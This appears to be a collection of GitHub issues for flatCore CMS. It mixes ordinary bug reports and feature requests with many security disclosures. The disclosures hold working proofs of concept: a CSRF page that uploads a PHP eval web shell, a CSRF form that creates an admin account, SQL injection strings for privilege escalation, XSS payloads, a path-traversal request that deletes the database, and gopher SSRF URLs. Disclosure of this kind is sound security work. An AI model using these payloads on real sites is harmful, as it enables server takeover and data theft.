Upload web shell
A clear and concise description of what the bug is.

To Reproduce
Steps to reproduce the behavior:

1. Login to flatcore CMS (admin user)
2. Click on 'Addons'
3. Click on 'Install'
4. Click on 'Plugin'
5. Choose a malious PHP file example is webshell.php
6. URL for malious PHP file: http://domain/upload/plugins/webshell.php
   

Screenshots
This POC for vuln :https://youtu.be/3w1M9eL_JiI
file payload
webshell.zip

Desktop (please complete the following information):

OS: tested in Linux
Browser : All
Version : Last version

Additional context
This vulnerability is extremely serious affecting the system. An attacker can take control of the entire server.

Anonymizing or deleting the log files should be an option in the ACP.

Wenn man eine Galerie erstellt und Bilder hinzufügt, bevor die Galerie gespeichert ist, gehen ALLE Eingaben verloren.

the link icon for comment on "ungeordnete Seiten" leads to
The requested URL /acp/core/ajax.comments.php was not found on this server.
because it is missing the subfolder like http://example.com/myFlatCoreInstall/acp/....

If you put it to the left side "geordnete Seiten" you get The requested content cannot be loaded.

Tested on 1.4.7 B: 76

Anybody knows or has tested FlatCore with PHP 7?
I think it is not difficult to get it running on PHP 7.

Describe the bug
Code execution vulnerabilities in the background

To Reproduce
Steps to reproduce the behavior:
1.Log in to the background
2.Go to /acp/acp.php?tn=pages&sub=new#position
3.Click info and enter the malicious php code in the Permalink parameter to jump out of the structure to execute the malicious code
4.Click save
5./content/cache/active_urls.php and /content/cache/cache_lastedit.php files will be inserted with malicious code
6.Visit the homepage and you will see that the malicious code we inserted was successfully executed and returned the result

Screenshots

Click Save New Page

/content/cache/active_urls.php and /content/cache/cache_lastedit.php files will be inserted with malicious code

Desktop (please complete the following information):

• OS: MacOS
• Browser All
• Version Last version

Title: CSRF Vulnerability in files.upload-script.php on FlatCore
Date: 26-May-2019
Discovered by: @Satuer from ABT Labs
Security: high (will cause the webshell to upload)
Software: https://github.com/flatCore/flatCore-CMS/archive/1.4.7.4.zip

Code: files.upload-script.php
There is no csrf check, only have a administrator check.(Moreover, there is no check on the file type, and did not change the uploaded file name)

Description:
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background.

Exploit:
We assume that FlatCore is installed at http://192.168.62.129/flatCore. Our target is acp/core/files.upload-script.php which is the page used to upload a new file. The given POC will upload a webshell to the website.

<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "/flatCore/acp/core/files.upload-script.php", true);
xhr.setRequestHeader("Accept", "application/json");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=--------795986992");
xhr.withCredentials = "true";
var body = "----------795986992\r\n" +
"Content-Disposition: form-data; name=\"upload_destination\"\r\n" +
"\r\n" +
"../content/\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"w\"\r\n" +
"\r\n" +
"600\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"h\"\r\n" +
"\r\n" +
"500\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"fz\"\r\n" +
"\r\n" +
"2800\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"unchanged\"\r\n" +
"\r\n" +
"\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"testwebshell.php\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"<?php eval($_REQUEST['parm']);?>\r\n" +
"----------795986992--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="submit" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

Before visit the POC, make sure you are logged in into an administrator account. Then open the HTML file and submit the form. The webshell have been uploaded.

Screenshots:
First, administrator login.

Then, administrator visit the malicious webpage.

Attacker visit webshell.

Suggest: Check CSRF tokens in all POST request.

in /acp/ edit/new page

Describe the bug
Permission Missing (bug/feature)...

To Reproduce
Steps to reproduce the behavior:

1. Go to login CMS
2. Click on User >> create user with do not actions (user1 ID=13)
   Screenshots
   

Account admin (administrator ID=12 )
Screenshots

3. Edit account user1 >> in Username change to administrator >> Update User
   Can arbitrarily change the login name. when the Username is the same as the admin account, the admin (ID = 12) will can't to delete that user (ID = 13), when it matches another account, the duplicate account will be disabled
   Screenshots
   

Desktop (please complete the following information):

• OS: All
• Browser: All
• Version: Last version

Describe the bug
An user with page creation/edition can create an XSS payload in description field to trigger XSS when view all page from admin panel
To Reproduce
Steps to reproduce the behavior:

1. Click on 'Create New Page'
2. Go to 'Meta Tags' tab
3. In the 'description' section, insert arbitrary XSS payload
4. Go to 'See all page'
5. See error

Expected behavior
The XSS payload will be triggered for anyone who view this page description (esspecially admin account).

Screenshots

Desktop (please complete the following information):

• OS: tested on kali linux
• Browser: tested on firefox
• Version: 2.0.7

video PoC
https://youtu.be/XkjPdJvnMQ0

Additional context
This bug can be exploited by anyone has edit/create page privileges

Exploit Title: SQL Injection vulnerability (Content DB) on FlatCore v1.4.6
Date: 11-April-2017
Exploit Author: @shardulm94
Software Link: https://github.com/flatCore/flatCore-CMS/archive/v1.4.6.zip
Version: 1.4.6

Description:
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

Exploit:
The vulnerability is due to a non-parameterized SQL query at https://github.com/flatCore/flatCore-CMS/blob/master/core/functions/func_get_content.php#L17 and a few following lines. We assume that FlatCore is installed at http://localhost/flatcore/. The exploit URL is http://localhost/flatcore/' OR page_status='ghost' LIMIT 0,1 --. This effectively results in the following query to be executed SELECT * FROM fc_pages WHERE page_id = '' OR page_status='ghost' LIMIT 0,1 --' which allows an unauthenticated user to be able to view all ghost/invisible pages without having links to them. The exploit URL can also be possibly modified to leak the content database using UNION based SQL injection attacks.

References:
https://www.owasp.org/index.php/SQL_Injection

Screenshots:
Viewing ghost pages

Impact: Read data from the content database
Mitigation: Use of Parameterized SQL Queries

Cache files and folders should be able to be cleared by the ACP.

Describe the bug
Store XSS in the Edit or Create New Snippets function

To Reproduce
Steps to reproduce the behavior:

1. Use the account to login to the admin interface
2. Select the snippets function to create new or edit existing snippets
3. Insert the xss payload in the following locations, then save:

• "Title" and "Keyword" fields in content
• "URL" field in URL

4. Back to the snippets management interface, payload is executed
   Screenshots
   
   XSS Payload:
   "><img src=a onerror=alert(document.domain)>
5. Then every time the snippets function is used, the payload will execute

Desktop (please complete the following information):

• OS: All
• Browser: All
• Version: Last version

For various reasons, it is currently not possible for me to spend the necessary time that a project with this scope requires.

Describe the bug
Cross Site Scripting (XSS) in the username section of the install page.
version: 2.1.0

To Reproduce
Steps to reproduce the behavior:

1. Go to 'CMS Install Page'
2. Insert into a XSS payload in username section
3. And XSS save
4. See error

OS: all
Browser : all
Version : all

Exploit Title: CSRF Privilege Escalation (Creation of an administrator account) on FlatCore v1.4.6
Date: 08-April-2017
Exploit Author: @shardulm94
Software Link: https://github.com/flatCore/flatCore-CMS/archive/v1.4.6.zip
Version: 1.4.6

Description:
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background. In the case of FlatCore, we can use CSRF to perform actions on the admin dashboard by targeting an administrator.

Exploit:
We assume that FlatCore is installed at http://localhost/. Our target is acp/acp.php?tn=user&sub=new&edituser= which is the page used to create a new user. The given POC will create a user on the website which has full administrator privileges.

<html>
<body>
    <form method="POST" action="http://localhost/acp/acp.php?tn=user&sub=new&edituser=">
        <input type="hidden" name="user_nick" value="testcsrf" />
        <input type="hidden" name="user_registerdate" value="" />
        <input type="hidden" name="user_verified" value="verified" />
        <input type="hidden" name="nbr_of_groups" value="0" />
        <input type="hidden" name="user_newsletter" value="none" />
        <input type="hidden" name="user_firstname" value="" />
        <input type="hidden" name="user_lastname" value="" />
        <input type="hidden" name="user_mail" value="[email protected]" />
        <input type="hidden" name="user_company" value="" />
        <input type="hidden" name="user_street" value="" />
        <input type="hidden" name="user_street_nbr" value="" />
        <input type="hidden" name="user_zipcode" value="" />
        <input type="hidden" name="user_city" value="" />
        <input type="hidden" name="user_psw_new" value="test" />
        <input type="hidden" name="user_psw_reconfirmation" value="test" />
        <input type="hidden" name="user_psw" value="" />
        <input type="hidden" name="drm_acp_class" value="administrator" />
        <input type="hidden" name="drm_acp_pages" value="drm_acp_pages" />
        <input type="hidden" name="drm_acp_editpages" value="drm_acp_editpages" />
        <input type="hidden" name="drm_acp_editownpages" value="drm_acp_editownpages" />
        <input type="hidden" name="drm_acp_files" value="drm_acp_files" />
        <input type="hidden" name="drm_acp_user" value="drm_acp_user" />
        <input type="hidden" name="drm_acp_system" value="drm_acp_system" />
        <input type="hidden" name="drm_moderator" value="drm_moderator" />
        <input type="hidden" name="drm_can_publish" value="drm_can_publish" />
        <input type="hidden" name="save_the_user" value="Save User" />
        <input type="submit" value="Submit!" />
    </form>
</body>
</html>

Before running the POC, make sure you are logged in into an administrator account. Then open the HTML file and submit the form. The new user with admin rights should now have been created.

References:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

Screenshots:
Before the exploit

Exploit Page

After submitting the form

New user added

With admin access

Impact: Compromises the entire web application and user data
Mitigation: Use of CSRF tokens

Creation of a user account was just an example. Other pages/settings in the admin dashboard are also vulnerable to CSRF. For example, the Global Headers (HTML) features can be misused to inject JS into the website.

Describe the bug
An attacker could insert any executable code through php via Module Addons to execution command in the server.

To Reproduce
Steps to reproduce the behavior:

1. Log into the panel.
2. Go to "/acp/acp.php?tn=moduls&sub=u"
3. Click Module > Install > Upload payload file zip.
4. Click file upload install.
5. Go to view remote code execution server.

Screenshots

File payload: rce.zip

Desktop (please complete the following information):

• OS: Linux
• Browser : All
• Version : Last version

how are you?

for [Version 2.1.1]
after i have installed,when i open the site,can not open
This page isn’t working
redirected you too many times.
ERR_TOO_MANY_REDIRECTS

for [Version 2.1.0],it is ok.

Alert in ACP > Dashboard if no .htaccess file exists

Maybe the directory /acp/ should be named dynamically? Immediately at installation or later via FTP.

RCE via upload addon plugin
It was identified that an authenticated user (admin) has the possibility to upload malicious files without any restriction. In this specific case, arbitrary server side PHP code such as web shells can be uploaded. As a result the attacker can run arbitrary code on the server side with the privileges of the web server. This could lead to a full system compromise.

To Reproduce
Steps to reproduce the behavior:

1. Login to flatcore CMS (admin user)
2. Click on 'Addons'
3. Click on 'Install'
4. Click on 'Plugin'
5. Choose a malious PHP file (revershell, webshell...), example is shell.php
6. URL for malious PHP file: http://domain/upload/plugins/shell.php

Screenshots

• This POC for vuln : https://www.youtube.com/watch?v=yoFkkgM1P8E

Desktop (please complete the following information):

• OS: tested in Linux
• Browser : All
• Version : Last version

Additional context
This vulnerability is extremely serious affecting the system. An attacker can take control of the entire server.

In der deutschen Sprachversion gibt es nur "Sie". Es ist üblich auch eine "Du" Version zu haben.

Describe the bug
Cross Site Scripting (XSS) via upload image function

To Reproduce
Steps to reproduce the behavior:

1. Login to flatcore CMS
2. Click on 'Upload file'
3. Drop svg file contains XSS payload , example filename : xss.svg
4. and XSS in url : http://domain/content/images/payload1.svg

Screenshots

xss.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS in flatCore CMS");
   </script>
</svg>

Desktop (please complete the following information):

• OS: All
• Browser : All
• Version : Last version

Additional context
XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user

What Your CMS is still missing is a pagemanager with treeview, which gives very much better overview (exists as plugin for wordpress, typesetter and cmsimple etc.)

One (or more) alternative database would be great.

die Tabelle fc_tokens wird vom Installer nicht angelegt.

Beim erstmaligen einloggen kommt
Fatal error: Call to a member function bindValue() on boolean in /core/functions/func_userdata.php on line 209

habe dann mal errorInfo eingebaut mit folgendem Ergebnis:
Array ( [0] => HY000 [1] => 1 [2] => no such table: fc_tokens )

Hey there!

I belong to an open source security research community, and a member (@Haxatron) has found an issue, but doesn’t know the best way to disclose it.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

Have installed flatCore and have changed the $languagePack = "en";
But the admin area is in German or Dutch.
How do I fix this.
Tom

There is a vulnerability in
flatcore cms 1.4.7 B: 73, which could delete content.sqlite3 file.

And by exploiting this vulnerability the application won't be accessible.

This vulnerability occurs because the file deletion request is just a GET request and there is no CSRF protection on the endpoint

This is the request is
http://localhost/flatCore-CMS/acp/acp.php?tn=filebrowser&sub=browse&delete=../../content/SQLite/content.sqlite3&d=1&start=0

Describe the bug
XSS in function Posts

To Reproduce
Steps to reproduce the behavior:

1. Login to CMS
2. Click on 'Posts' >> 'New Entry' >> Image
3. In Meta Data >> inject payload into Title
   Screenshots
   

payload: "><img src="x" onerror=alert(String.fromCharCode(88,83,83));>

Desktop (please complete the following information):

• OS: All
• Browser : All
• Version: Last versiom

Describe the bug
Cross Site Scripting (XSS) via save Exclude URLs

To Reproduce
Steps to reproduce the behavior:

1. Login to flatcore CMS
2. Click on 'Create new Page' after click 'Index'
3. Insert into a XSS payload in Exclude URLs
4. And XSS save on : http://domain/acp/acp.php?tn=pages&sub=index
   Screenshots
   
   XSS payload

Desktop (please complete the following information):

• OS: all
• Browser : all
• Version : all

Additional context
The XSS attack will help the hacker get the login session of other users requiring them to have at least one "Create new Pages" permission.

Maybe, we should merge Plugins and Modules.

Title: XSS Vulnerability in acp.php
Security: Low (visit acp.php as a administrator)
Software: https://codeload.github.com/flatCore/flatCore-CMS/zip/v1.4.6
code:
pages.edit_form.php:

Reproduce: (get client cookie information)
http://localhost/fc/acp/acp.php/p3q7o'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eoqch8?tn=pages&sub=edit&editpage=2

reference about XSS:
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Discovered by: ghi from Huawei Weiran Labs

Hey,

I found 2 XSS in your application:

1. Reflected XSS in index.php / user_management.php

Your user_management.php is vulnerable to reflected xss
http://127.0.0.1/index.php/%22%3C/a%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
This is because you use $_SERVER['PHP_SELF'] to build links.

This is verified with the github version as well as with Version: 1.4.6

2. Stored XSS in logfile

Version 1.4.6 from your website is also vulnerable to stored xss by the following request:

GET /index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: <script>alert(123)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1

This is triggered when the administrator opens the log view.

Cheers

In der Dokumentation ist nicht beschrieben, wo man Module findet und wie sie installiert werden.

Hello everyone,
as this project is getting more and more time consuming, I urgently need help for maintaining. From answering issues, fixing bugs, improving the core and so on ...
If you are interested, just get in touch here or by email: [email protected]

Describe the bug
Meta etiketlere ve içeriğe yazılan xss yükünü filtrelememek

https://owasp.org/www-community/attacks/xss/

To Reproduce
Steps to reproduce the behavior:
1-) press create new page from home page

2-) Enter the meta tags and content e xss payload

3-) go to admin panel and press go to home page button and xss pop-up

Expected behavior
A clear and concise description of what you expected to happen.

Screenshots
If applicable, add screenshots to help explain your problem.

Additional context
POC : https://www.youtube.com/watch?v=wmQf0B3Sa6c

Exploit Title: SQL Injection vulnerability (Users DB) on FlatCore v1.4.6
Date: 11-April-2017
Exploit Author: @shardulm94
Software Link: https://github.com/flatCore/flatCore-CMS/archive/v1.4.6.zip
Version: 1.4.6

Description:
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

Exploit:
The vulnerability is due to a non-parameterized SQL query at https://github.com/flatCore/flatCore-CMS/blob/master/core/password.php#L37. This vulnerability along with missing validation on the email field of the registration and password reset forms can be used to create an administrator account with full privileges. We assume that FlatCore is installed at http://localhost/flatcore/ and new registrations are enabled.

1. Go to http://localhost/flatcore/register/. Fill in the username uname and some password. Fill in the email fields as '; UPDATE fc_user SET user_class='administrator', user_verified='verified', user_drm='||drm_acp_user|||||' WHERE user_nick='uname' --. This step is required since the password reset form checks for valid emails in the DB before reset.
2. Since the register page uses parameterized query, the whole email string will be stored in the DB.
3. Now go to http://localhost/flatcore/password/ and put in the email address mentioned while registering. Due to https://github.com/flatCore/flatCore-CMS/blob/master/core/password.php#L36, the query will effectively become UPDATE fc_user SET user_reset_psw = '$reset_token' WHERE user_mail = ''; UPDATE fc_user SET user_class='administrator', user_verified='verified', user_drm='||drm_acp_user|||||' WHERE user_nick='uname' --.
4. As you can see, this will set administrator as the user class for now newly created user uname and will also give it permissions to manage the user management screen.
5. Once inside the admin panel, the attacker can give himself extra privileges.

References:
https://www.owasp.org/index.php/SQL_Injection

Screenshots:
Registration Form

Password Reset

New user created and verified with ability to edit users

Logged in as new user and change privileges

Impact: Read and modify the users database
Mitigation: Use of Parameterized SQL Queries and Validation on email fields

flatCore is now history and will not be developed further.
But there is a new successor: https://github.com/SwiftyEdit

Vulnerability : Stored XSS
Severity : High
Parameter : group_name

Steps to reproduce :

1. Go to Dashboard -> Left navigation menu -> Under "User" drop down select "Edit Usergroup" button.
2. Place a payload "> in the group_name parameter "group name"
3. Fill the required fields, add users and click on Save button
4. Navigate to "Show all user", Choose the users which you are added to group and click on "Edit"
5. It can be observed that XSS payload is executed on the application
6. Logout the application and login with valid user credentials
7. Go to "Show all user" , Click on users tab you will see Stored XSS payload is executed on the application

What is the Impact ?

This vulnerability allows an attacker to either permanently or temporarily inject client-side code into the target website. This code executes when the page is loaded by the victim and the client-side code may carry out activities such as: stealing cookies/sessions, modifying the page contents, logging key strokes, etc.

How to Fix ?

Sanitize the data collected from input fields before further processing

Proof : https://www.youtube.com/watch?v=sNHJAlep3cM&feature=youtu.be

Regards,
Jashwanth

Describe the bug
XSS via upload file function

To Reproduce
Steps to reproduce the behavior:

1. login in to background
2. Click on 'Files' >> 'Upload Files'
3. Drop pdf file contains XSS payload
4. Vuln url in : http://domain/content/files/poc.pdf
   Screenshots
   

File payload: poc.pdf

Desktop (please complete the following information):

• OS: All
• Browser: chrome
• Version: Last version

Additional context
Attacker can send malicious files to victims and steals victim's cookie leads to account takeover.
The person viewing the file of a contact can be victim of XSS.

Describe the bug
Server-side request forgery vulnerability (SSRF)

To Reproduce
Steps to reproduce the behavior:
1.go to 'acp/acp.php?tn=pages&sub=index'
2. Enter the intranet address in the box to request
3. Can make a request to the intranet

Screenshots

request packet

Locate the vulnerable code /acp/core/pages.index.php
The start_index parameter calls the function fc_crawler

Tracing the fc_crawler function
Locate the vulnerable code /acp/core/functions_index.php

Continue to track the fc_loadSourceCode function

dict protocol for request

dict://ip:port

Use gopher protocol for request
gopher://192.168.172.114:9333/aaaaa

Led to the SSRF vulnerability

Desktop (please complete the following information):

• OS: MacOS
• Browser all
• Version last version

Describe the bug
Store XSS in Edit picture/file function

To Reproduce
Steps to reproduce the behavior:

1. Use the account to login to the admin interface
2. Upload files or photos via the upload function
3. In the file management interface, use the image or file information editing function
4. Insert xss payload in "Alt" field then save
5. Payload is executed
   Screenshots
   

XSS Payload:
"><img src=a onerror=alert(document.domain)>
6. Then every time the image/file info editing function is used, the payload executes

Desktop (please complete the following information):

• OS: All
• Browser: All
• Version: Last version

There are any files uploaded in the background of your website, you can upload PHP files, so that if the administrator password is leaked, the file uploaded through here can be directly getshell, take over the web
example:

I think you should limit the type of file you upload